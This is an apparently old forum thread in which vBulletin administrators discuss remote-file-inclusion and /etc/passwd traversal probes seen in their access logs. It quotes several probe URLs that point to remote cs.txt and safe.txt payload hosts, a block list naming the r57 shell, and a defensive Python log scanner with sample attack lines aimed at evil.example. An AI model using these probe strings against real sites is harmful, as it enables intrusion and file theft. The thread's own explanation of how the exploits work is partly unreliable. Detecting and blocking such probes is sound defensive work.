Strange Spider!

  • Milado
    Senior Member
    • Mar 2005
    • 703
    • 3.8.x

    Strange Spider!

    I caught a spider naming itself wget spider, and it was crawling this page in my forum: /forum/showthread.php?t=http://ninaru.hut2.ru/images/cs.txt?

    Its user-agent is: Wget/1.1 (compatible; i486; Linux; RedHat7.3)

    Its IP is: 75.136.128.168

    IP resolving gives: 75-136-128-168.dhcp.gnvl.sc.charter.com

    Did you experience anything like this?
    Syrian Medical Society - mi la do - My Hacks - vCharset converter - Projects Queue

    I want to breathe the freedom, and to strew the mounts of nostalgia in your eyes.
  • derfy
    Senior Member
    • Jul 2005
    • 244
    • 3.8.x

    #2
    It's trying to exploit vBulletin. Don't worry, it can't do it that way (I asked Zachery about it).

    Comment

    • Adrienne
      Senior Member
      • Dec 2006
      • 190
      • 3.0.7

      #3
      We've been getting several of those every day! The IP always changes, but all the URLs are similar. Here's a site that logs attacks, you can see more like it:



      They can't get in, but I put the following words in our Censored Words list just to be on the safe side.

      {ninaru} {hut2} {ru} {amyru} {h18} {kaos} {r57} {amygirl}

      Comment

      • SNN
        Senior Member
        • Jul 2006
        • 856
        • 4.0.0

        #4
        wget is (if you didn't already know) a Linux download program,
        such as: wget http://path.to/site/file.name
        So I think they were trying to download your showthread.php somehow but failed?

        Comment

        • zappsan
          Senior Member
          • Sep 2004
          • 1143
          • 3.8.x

          #5
          I get tons of them. They haven't done anything so far but I'd still wish they'd go away, their long URLs stretch the "Who is online?" page.

          Location:
          /index.php//vb/faq?cmd=http://someurl.de/img/safe.txt? or /index.php//vb/faq?remote=http://someurl.de/img/safe.txt?
          Agent: libwww-perl/5.805

          Is it trying to exploit the forum through the FAQ?
          *Insert text here* :)

          Comment

          • SNN
            Senior Member
            • Jul 2006
            • 856
            • 4.0.0

            #6
            Originally posted by zappsan
            I get tons of them. They haven't done anything so far but I'd still wish they'd go away, their long URLs stretch the "Who is online?" page.

            Location:
            /index.php//vb/faq?cmd=http://someurl.de/img/safe.txt? or /index.php//vb/faq?remote=http://someurl.de/img/safe.txt?
            Agent: libwww-perl/5.805

            Is it trying to exploit the forum through the FAQ?
            looks like it.

            Comment

            • streetjob
              Member
              • Jan 2004
              • 78

              #7
              any updates on this...?

              Comment

              • Dream
                Senior Member
                • Mar 2001
                • 1898
                • 3.6.x

                #8
                I got a

                showthread.php?t=../../../../../../../etc/passwd

                one of these days :P
                Radio and TV Player for vBulletin

                Comment

                • streetjob
                  Member
                  • Jan 2004
                  • 78

                  #9
                  In my logs I see this:

                  [27/Jan/2008:01:15:22 +0600]"GET /showthread.php?p=http://amyru.h18.ru/images/cs.txt?

                  Please advise what to do...

                  Comment

                  • zappsan
                    Senior Member
                    • Sep 2004
                    • 1143
                    • 3.8.x

                    #10
                    ^I get that one a lot, it doesn't really seem to do anything...
                    *Insert text here* :)

                    Comment

                    • simsim
                      Senior Member
                      • Nov 2005
                      • 1625
                      • 3.6.x

                      #11
                      These are called site rippers. They could be harmful in many ways. While vBulletin is immune to this kind of attack, another use of these rippers is performing DoS attacks by consuming bandwidth via a huge number of requests to the server. They could all be blocked by adding them to your domain's .htaccess file. Check this guide for details.
                      You're spending millions of dollars on a website?!

                      Comment

                      • streetjob
                        Member
                        • Jan 2004
                        • 78

                        #12
                        thanks simsim,

                        According to theplanet security department this is

                        " is an example of a malicious file being inserted into your content - cs.txt"

                        he was referring to:

                        grep =http /usr/local/apache/domlogs/* | grep txt

                        [27/Jan/2008:01:15:22 +0600]"GET /showthread.php?p=http://amyru.h18.ru/images/cs.txt?

                        I am really concerned about this as I have heard differing views. Does this mean my server is compromised or the vbulletin is compromised? Is there a fix for this?

                        Please advise...

                        Thanks

                        Comment
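                        The log line streetjob quotes, and the URLs posted earlier in the thread, all share one of two shapes: a vBulletin query parameter whose value is an absolute URL to a remote text file (a remote file inclusion probe), or a chain of ../ segments pointing at /etc/passwd (a traversal probe). The Python script below is an added example written for this page, not code from the thread, from vBulletin or from the host's security department; it parses Apache combined-format access-log lines and flags both shapes, so the question in post #12 can be answered from your own logs rather than from a bare grep. The sample lines, IP addresses and host names in it are constructed for the example.

```python
import re
from collections import Counter
from urllib.parse import parse_qsl, unquote, urlsplit

# Apache "combined" log format. The field layout is the standard one; the
# regex itself is written for this example.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# Shape 1 (remote file inclusion probe): a query value that is itself an
# absolute URL, e.g. showthread.php?t=http://host/images/cs.txt?
REMOTE_URL_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)
# Shape 2 (local file inclusion / traversal probe): two or more ../ segments,
# e.g. showthread.php?t=../../../../../../../etc/passwd
TRAVERSAL_RE = re.compile(r'(?:\.\./){2,}')


def parse_line(line):
    """Return the log fields as a dict, or None if the line is not combined format."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def classify(target):
    """Return [(kind, param, decoded_value), ...] for every suspicious query parameter."""
    query = urlsplit(target).query
    findings = []
    for param, value in parse_qsl(query, keep_blank_values=True):
        # parse_qsl already decoded one layer; undo a second layer of %-encoding too
        value = unquote(value)
        if REMOTE_URL_RE.match(value):
            findings.append(('rfi', param, value))
        elif TRAVERSAL_RE.search(value):
            findings.append(('lfi', param, value))
    return findings


def scan(log_text):
    """Scan raw log text and return one finding per suspicious parameter."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        for kind, param, value in classify(rec['target']):
            findings.append({
                'ip': rec['ip'], 'ts': rec['ts'], 'agent': rec['agent'],
                'status': rec['status'], 'kind': kind, 'param': param, 'value': value,
            })
    return findings


def ips_to_block(findings, min_hits=2):
    """Source IPs with at least min_hits findings: candidates for an .htaccess deny list."""
    counts = Counter(f['ip'] for f in findings)
    return sorted(ip for ip, n in counts.items() if n >= min_hits)


# Constructed sample lines (documentation-range IPs, made-up hosts) in the
# shapes posted in the thread; they are not real log entries.
SAMPLE_LOG = """\
192.0.2.10 - - [27/Jan/2008:01:15:22 +0600] "GET /showthread.php?p=http://evil.example/images/cs.txt? HTTP/1.1" 200 5120 "-" "Wget/1.1 (compatible; i486; Linux; RedHat7.3)"
203.0.113.7 - - [27/Jan/2008:01:16:03 +0600] "GET /index.php//vb/faq?cmd=http://evil.example/img/safe.txt? HTTP/1.0" 200 3311 "-" "libwww-perl/5.805"
203.0.113.7 - - [27/Jan/2008:01:16:04 +0600] "GET /index.php//vb/faq?remote=http://evil.example/img/safe.txt? HTTP/1.0" 200 3311 "-" "libwww-perl/5.805"
198.51.100.9 - - [27/Jan/2008:02:40:11 +0600] "GET /showthread.php?t=../../../../../../../etc/passwd HTTP/1.1" 200 2890 "-" "Mozilla/4.0"
192.0.2.44 - - [27/Jan/2008:02:41:30 +0600] "GET /showthread.php?t=1234&page=2 HTTP/1.1" 200 45120 "http://forum.example/forumdisplay.php?f=3" "Mozilla/5.0"
"""

if __name__ == '__main__':
    hits = scan(SAMPLE_LOG)
    for f in hits:
        print(f"{f['ip']:15} {f['kind']} {f['param']}={f['value']}  ({f['agent']})")
    print('block candidates:', ips_to_block(hits))
```

                        Two things worth keeping in mind when reading the output. The 200 status on these lines is just vBulletin serving its own "invalid thread" error page, so the status code says nothing about whether the included file was ever fetched; what settles that is whether the application passes the parameter value to include, require or fopen, and the earlier replies say it does not. And the IP counts only tell you which sources are noisy enough to be worth a deny rule; the hosts named in the URLs are the attacker's payload servers, not the machines sending the requests.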

                        • xjuliox
                          Senior Member
                          • Sep 2005
                          • 1048
                          • 3.7.x

                          #13
                          Tonight I saw them in the forums; before, they would be in the homepage of my site. I got about 15 web addresses this time around.
                          Arcade.gs Game Site!

                          Comment

                          • Thalamus
                            New Member
                            • Jun 2005
                            • 26
                            • 3.6.x

                            #14
                            As simsim says, these are (very old) kiddie scripts that attempt to exploit a loophole that was inherent in very early versions of BB/forum and/or chat software applications. Basically, the way old parsers used to work was that anything after the URL (php, asp etc) is effectively a parameter list and browsers/applications used to follow these as an execute command. So for instance, if the tagged parameter to a GET was an off-site command list, then the server would attempt to execute it, thus running malicious commands.

                            As has been said though, the more recent applications take the GET parameter lines as literals (which is why, when developing, it is SOOOO important to ensure that your code correctly and safely parses the GET parameters!!), so consequently the error message is displayed and it goes no further.

                            It is certainly a bandwidth annoyance, but the more crucial issue about these scripts is that they are run by zombie computers that have already been infected by visiting sites that download malware (generally pr0n or warez sites), and are done in the background without the user's knowledge. These are then used by botmasters to effect DDOS attacks. I've compared many of these script IPs with those logged during very strong DDOS attacks in the past, and the lists are frighteningly exact in their comparisons.

                            Of course I place IP bans on them; my htaccess file is currently hitting around 35K, and I expect it to go much higher. I've set my 403.shtml file to explain why it's likely an IP number has been banned, and outlined the steps to take to clean their computer. They can then send an email (appropriately formatted) to me with the results of their anti-virus report and I would then, if I'm convinced, remove the block on the IP.

                            Comment

                            • Balthasorus
                              Member
                              • Oct 2007
                              • 72
                              • 3.8.x

                              #15
                              If it's that bad then ban it.

                              Comment
